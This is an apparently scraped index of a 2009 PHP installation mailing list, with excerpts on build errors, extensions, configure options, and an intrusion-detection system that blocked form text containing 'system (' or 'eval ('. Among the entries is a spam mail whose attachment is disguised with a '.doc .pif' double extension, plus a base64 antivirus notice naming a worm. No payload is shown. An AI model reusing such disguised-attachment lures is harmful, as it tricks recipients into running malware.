href=3D"http://tinyurl.com/3oxavw">http://tinyurl.com/3oxavw</a></strong>&n= bsp;</p> <p>and <strong></strong></p> <p><strong><a = href=3D"http://www.dmsignup 2009-08-20T06:08:37 "system (" in any textarea hangs php/apache ? [RESOLVED] http://php-groups.com/php.install/-system-in-any-textarea-hangs-php-apache-RESOLVED --0023545bd09885e74004715bb91c Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Thanks all for your input. Nothing was getting logged into our servers in case of timeouts and eventually it did turn out to be an external problem. The issue here was that our university's boundary intrusion detection system parses GET and POST variables and anything akin to "system (" or "eval (" is taken as an attempt to a function call and its not let through. Thanks all, Vineet On Sun, Aug 16, 2009 at 7:44 AM, lists-php wrote: > I realized that this wasn't 2009-08-17T19:51:15 "system (" in any textarea hangs php/apache ? http://php-groups.com/php.install/-system-in-any-textarea-hangs-php-apache --001636c5b526793d88047135e8b2 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit I have a fresh php 5.2.6 install on Apache 2 under CentOS 5.3. After receiving complaints from some users that they were unable to submit their abstracts on our proposal submission website, I was able to isolate the problem to this minimal and extremely simple example: <html> <head> </head> <body> <form name="submitform" action="phantomurl.php" method="post"> <textarea name="mytextarea"></textarea> <input type="submit" value="Submit"/> </form> </body> </html> The 2009-08-15T22:44:14 [Fwd: Re: [PHP-INSTALL] compiling failed ...] http://php-groups.com/php.install/-Fwd-Re-PHP-INSTALL-compiling-failed This is a multi-part message in MIME format. --------------000004090302000809030003 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit --------------000004090302000809030003 Content-Type: message/rfc822; name="Re: [PHP-INSTALL] compiling failed ....eml" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="Re: [PHP-INSTALL] compiling failed ....eml" Return-Path: <pattersunx@gmail.com> Received: from ?192.168.1.100? (61.25.71-86.rev.gaoland.net [86.71.25.61]) by mx.google.com with ESMTPS id 5sm825786eyf.48.2 2009-08-11T20:41:12 compiling failed ... http://php-groups.com/php.install/compiling-failed HI, I am trying to compile the last PHP 5.3.0 source, i have the apache 2.2.11 source ... ~/fossSrc/php-5.3.0> make /bin/sh /home/sysadmin/fossSrc/php-5.3.0/libtool --silent --preserve-dup-deps --mode=compile gcc -I/usr/sfw/apache2/include -DLINUX=2 -D_REENTRANT -D_GNU_SOURCE -D_LARGEFILE64_SOURCE -I/usr/sfw/apr/include -I/usr/sfw/apr-util/include -I/usr/include -Isapi/apache2handler/ -I/home/sysadmin/fossSrc/php-5.3.0/sapi/apache2handler/ -DPHP_ATOM_INC -I/home/sysadmin/fossSrc/php-5.3.0/include -I/home/sysadmin/fossSrc/php-5.3.0/main -I/home/sysadmin/fossSrc/ 2009-08-11T15:20:28 Why does ext/zlib have config0.m4 instead of config.m4 http://php-groups.com/php.install/Why-does-ext-zlib-have-config0.m4-instead-of-confi On Mac OS X, to build the zlib.so shared module, I can run PHP's main "configure" script with the "--with-zlib=shared,[DIR]" argument and then run "make build-modules". Most of what PHP's main configure script does is irrelevant to building just one extension, and for most extensions, I can make this step go faster by not calling PHP's main configure script, but instead running "phpize", "./configure" and "make" in the extension directory itself. For the zlib extension, though, phpize complains that there isn't a file called config.m4. There is a file called config0. 2009-08-05T19:20:28 Where are dbase, fbsql, fdf, ncurses, mhash, ming, msql and sybase now? http://php-groups.com/php.install/Where-are-dbase-fbsql-fdf-ncurses-mhash-ming-msql PHP 5.3.0's NEWS file says: - Moved extensions to PECL (Derick, Lukas, Pierre, Scott): . ext/dbase . ext/fbsql . ext/fdf . ext/ncurses . ext/mhash (BC layer is now entirely within ext/hash) . ext/ming . ext/msql . ext/sybase (not maintained anymore, sybase_ct has to be used instead) But I cannot find dbase, fbsql, fdf, mhash, msql or sybase in PECL. ming is there but has no downloads available. ncurses has a single download available from 2006. If these extensions have been removed from PHP with 5.3.0, where can I get them now? 2009-08-05T19:08:52 Help with windows extensions in PHP 5.3.0 http://php-groups.com/php.install/Help-with-windows-extensions-in-PHP-5.3.0 Hello all, I've recently installed PHP 5.3.0 on Windows XP and surprisingly it comes with quite few extensions. I missed mcrypto, mhash, zlib and zip. Please, could you tell me how I can get those extensions? Thanks for your time __________ Information from ESET Smart Security, version of virus signature database 4299 (20090802) __________ The message was checked by ESET Smart Security. http://www.eset.com 2009-08-03T07:42:19 400 error upon installing PHP http://php-groups.com/php.install/400-error-upon-installing-PHP I can't quite figure out where I've gone wrong, but my PHP installation isn't working. I just installed PHP 5.3 (VC6) for Windows on top of Apache 2.0.63, as CGI. The apache part works fine -- my browser can load .html files from apache's htdocs directory without a problem. But when I try to view a .php file I put into htdocs (even if it's pure HTML), my browser returns a 400 error. My apache httpd.conf file contains the following, which all looks correct to me per the instructions: #BEGIN PHP INSTALLER EDITS - REMOVE ONLY ON UNINSTALL ScriptAlias /php/ "C:/Program Files/PHP/" 2009-08-02T18:03:39 Shared mysql modules with mysqlnd http://php-groups.com/php.install/Shared-mysql-modules-with-mysqlnd Hi. I'm the maintainer of php in MacPorts. Our php5 port has been monolithic, with all modules compiled in statically. I'm now switching this to a more modular architecture so that shared modules can be added and removed as needed. I wanted to make the mysql modules use mysqlnd by default for the obvious reasons, but I'm having trouble making them work this way as shared modules. I think they were working fine with mysqlnd when compiled into php statically. Using php 5.3.0 I see: $ php PHP Warning: Cannot load module 'mysql' because required module 'mysqlnd' is n 2009-07-31T20:08:48 php-cgi + extensions "not stripped" http://php-groups.com/php.install/php-cgi-extensions-not-stripped hi, i'm trying to install php 5.2.9 as a CGI from source on a centos 5.3 system. compiling and using the cgi does work, but the resulting binary is significantly larger than the 5.1.6 one packaged with centos (4,2M vs 2,8M) which seems to be related to php-cgi (and extensions) being not stripped (linked in libraries are not the problem, ldd is the same for both binaries). i'm not a c programmer, so my knowledge about compiling is limited, but this is what i tried: i started from the configuration centos/redhat uses for compiling their rpm. relevant configure flags are: -- 2009-07-27T11:57:08 --with--config-file-scan-dir multiple paths http://php-groups.com/php.install/-with-config-file-scan-dir-multiple-paths Hello, i try to use multiple paths for this configure-switch. I tried with: --with-config-file-scan-dir=/etc/php5-config:/etc/php5-config-extra I hoped that common Path-Separator ":" could be used. But php-ignores this path completely. Ist there a way to achieve this? Background is that i use different php-versions on machine. Some php-versions use same ini-scan-dir for additional inis and some should use a 2nd ini-scan-dir for separat inis. hmm, ideas? Thanks, Andre 2009-07-22T07:52:23 Problems building 5.3 with apache2 support http://php-groups.com/php.install/Problems-building-5.3-with-apache2-support Hi list. I'm trying to build php 5.3 on Ubuntu. I have installed apache2-threaded-dev and used the following configure settings: ../configure --with-apxs2=/usr/bin/apxs2 Running make starts building some files until it fails with the following output: (snip) ext/sqlite3/libsqlite/sqlite3.o: In function `memset': /usr/include/bits/string3.h:82: warning: memset used with constant zero length parameter; this could be due to transposed parameters ext/standard/.libs/info.o: In function `php_info_print_table_header': /home/tkn/public/php-5.3.0/ext/standard/info.c:1071: undefined 2009-07-18T00:03:31 Re: A!p$ghsa http://php-groups.com/php.install/Re-A-p-ghsa This is a multi-part message in MIME format. ------=_NextPart_000_0016----=_NextPart_000_0016 Content-Type: text/plain; charset="Windows-1252" Content-Transfer-Encoding: 7bit See the ghg5%&6gfz65!4Hf55d!46gfgf <Server Error #203> ------=_NextPart_000_0016----=_NextPart_000_0016 Content-Type: application/octet-stream; name="document07_php-install.doc .pif" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="document07_php-install.doc 2009-07-15T14:11:05 [Infected atch removed] Hello http://php-groups.com/php.install/-Infected-atch-removed-Hello Q3liZXJvYW0gQW50aS1WaXJ1cyByZXBvcnRzIGEgdmlydXMNCmluIHRoZSBmb2xsb3dpbmcgbWVz c2FnZToNCi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCkZyb206IHZpbmNlbnRAYmxhdmV0Lm5ldA0K VG86IHBocC1pbnN0YWxsQGxpc3RzLnBocC5uZXQNCkRhdGU6IDIwMDktMDctMTUgMDk6MzQ6MzcN Cg0KDQpWaXJ1cyBOYW1lKHMpOiAnTmV0LVdvcm0uV2luMzIuTXl0b2IuZGFtJw0KQXR0YWNobWVu dCBOYW1lKHMpOiAuc2NyCg0KLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0K 2009-07-15T02:33:48 PHP Startup: Invalid library (maybe not a PHP library) 'oci8.so' in Unknown on line 0 http://php-groups.com/php.install/PHP-Startup-Invalid-library-maybe-not-a-PHP-librar Hello, I need to access an oracle database from php. The server is running php 5.2.5, then I downloaded the source package used to compile this version. I downloaded also oracle-instantclient11.1-basic-11.1.0.7.0-1.i386.rpm and oracle-instantclient11.1-devel-11.1.0.7.0-1.i386.rpm After some time tewaking with ./configure of php, I managed to compile with ./configure --with-oci8=shared,instantclient I want to compile oci8 as shared library so I can continue using the same binaries and only add a .so to the extensions directory, but I has a problem now. When starting, php reports 2009-07-10T13:48:52 PHP 5.3 ./configure --with-curl problem http://php-groups.com/php.install/PHP-5.3-configure-with-curl-problem Hello, =A0=A0=A0=A0=A0=A0=A0=A0=A0 I am trying to install PHP 5.3 from source on O= S RH ( arch x86_64 ) using ./configure --with-curl and i get the following error in the config.log configure:27042: checking for curl_easy_perform in -lcurl configure:27061: gcc -o conftest -g -O2 -fvisibility=3Dhidden -Wl,-rpath,/usr/kerberos/lib64 -L/usr/kerberos/lib64 -Wl,-rpath,/usr/kerberos/lib64 -L/usr/kerberos/lib64 -lcurl -ldl -lgssapi_krb5 -lkrb5 -lk5crypto -lcom_err -lidn -lssl -lcrypto -lz conftest.c -lcurl -lcurl -lm -ldl -lnsl -lxml2 -lz -lm -lcurl -ldl -lgssapi_krb5 -lkrb5 -lk5crypt 2009-07-06T14:24:51 GD install http://php-groups.com/php.install/GD-install --00504502c8638cde41046dd8a331 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Hi all, I have a question that seems to be very simple: 1) The scenario: - I Linux server with Apache+PHP running with several services. The httpd.conf and php.ini are fully customized. 2) The task - Now I have to set up a new service that need the GD library. So I have to install/enable GD in the server. 3) The big question If I simply hit: apt-get install php-gd Will I just install the GD library properly (as I need)?? OR will I mess up all the previo 2009-07-04T03:12:11 Veracity of statement that FastCGI is always enabled cannot be disabled in PHP 5.3 http://php-groups.com/php.install/Veracity-of-statement-that-FastCGI-is-always-enabl Hi. I'm the maintainer of PHP in MacPorts and I'm in the process of updating our php5 port to version 5.3.0. In PHP 5.2.x and earlier you had to choose which web SAPI you wanted -- Apache 1, Apache 2, or FastCGI. The CLI SAPI was always built in any case, in addition to the web SAPI you selected, but you couldn't have both an Apache SAPI and the FastCGI SAPI built at the same time; you had to run "./configure" and "make" twice each, and this is what my php5 port currently does to allow a user to install both an Apache SAPI and the FastCGI SAPI at the same time if desire 2009-07-02T13:23:40